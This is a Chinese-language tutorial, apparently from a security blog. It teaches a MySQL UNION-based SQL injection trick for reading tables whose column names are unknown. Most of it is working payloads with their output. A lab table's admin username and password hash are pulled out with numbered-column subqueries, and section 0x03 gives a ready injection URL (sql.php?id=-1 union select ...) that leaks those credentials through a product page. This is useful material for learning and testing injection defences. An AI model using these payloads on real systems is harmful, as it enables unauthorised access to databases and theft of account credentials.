0x00 概要
在无法获取列名的时候很好用
0x01 实验数据表
# tdb_goods表 一共7个字段
mysql> select * from tdb_goods limit 0,1;
+----------+-----------------------+------------+------------+-------------+---------+------------+
| goods_id | goods_name | goods_cate | brand_name | goods_price | is_show | is_saleoff |
+----------+-----------------------+------------+------------+-------------+---------+------------+
| 1 | R510VC 15.6英寸笔记本 | 笔记本 | 华硕 | 3399.000 | 1 | 0 |
+----------+-----------------------+------------+------------+-------------+---------+------------+
1 row in set
# tdb_admin 表 一共3个字段
mysql> select id,username,password from tdb_admin limit 0,1;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 7fef6171469e80d32c0559f88b377245 |
+----+----------+----------------------------------+
1 row in set
0x02 实验
假设现在只知道表名不知道列名,但是我们又需要读数据那么我们的sql可以这样写: select 1,2,3 union select * from tdb_admin;
mysql> select 1,2,3 union select * from tdb_admin;
+---+-------+----------------------------------+
| 1 | 2 | 3 |
+---+-------+----------------------------------+
| 1 | 2 | 3 |
| 1 | admin | 7fef6171469e80d32c0559f88b377245 |
+---+-------+----------------------------------+
2 rows in set
tdb_admin表的id,username,password
列给替换成了1,2,3
列,这样就不需要知道这表原来的列名叫什么.
接着下一步操作,查出数据以下为sql
- id 替换为 1
- username 替换为 2
- password 替换为 3
# 取 tdb_admin数据的id字段的数据
mysql> select `1` from (select 1,2,3 union select * from tdb_admin) a limit 1,1;
+---+
| 1 |
+---+
| 1 |
+---+
1 row in set
# 取 tdb_admin数据的username字段的数据
mysql> select `2` from (select 1,2,3 union select * from tdb_admin) a limit 1,1;
+-------+
| 2 |
+-------+
| admin |
+-------+
1 row in set
# 取 tdb_admin数据的password字段的数据
mysql> select `3` from (select 1,2,3 union select * from tdb_admin) a limit 1,1;
+----------------------------------+
| 3 |
+----------------------------------+
| 7fef6171469e80d32c0559f88b377245 |
+----------------------------------+
1 row in set
注意: 取数据时limit下表从1,1开始取才是tdb_admin表的第一条数据
0x03 实际结合
web语句: http://www.test.com/sql.php?id=-1 union select 1,2,3,4,5,6,(select 2
from (select 1,2,3 union select * from tdb_admin)a limit 1,1);
数据库语句: select from tdb_goods WHERE goods_id = -1 union select 1,2,3,4,5,6,(select concat(‘~’,1
,’~’,2
,’~’,3
) from (select 1,2,3 union select from tdb_admin)a limit 1,1);
mysql> select * from tdb_goods WHERE goods_id = -1 union select 1,2,3,4,5,6,(select concat('~',`1`,'~',`2`,'~',`3`) from (select 1,2,3 union select * from tdb_admin)a limit 1,1);
+----------+------------+------------+------------+-------------+---------+-------------------------------------------+
| goods_id | goods_name | goods_cate | brand_name | goods_price | is_show | is_saleoff |
+----------+------------+------------+------------+-------------+---------+-------------------------------------------+
| 1 | 2 | 3 | 4 | 5.000 | 6 | ~1~admin~7fef6171469e80d32c0559f88b377245 |
+----------+------------+------------+------------+-------------+---------+-------------------------------------------+
1 row in set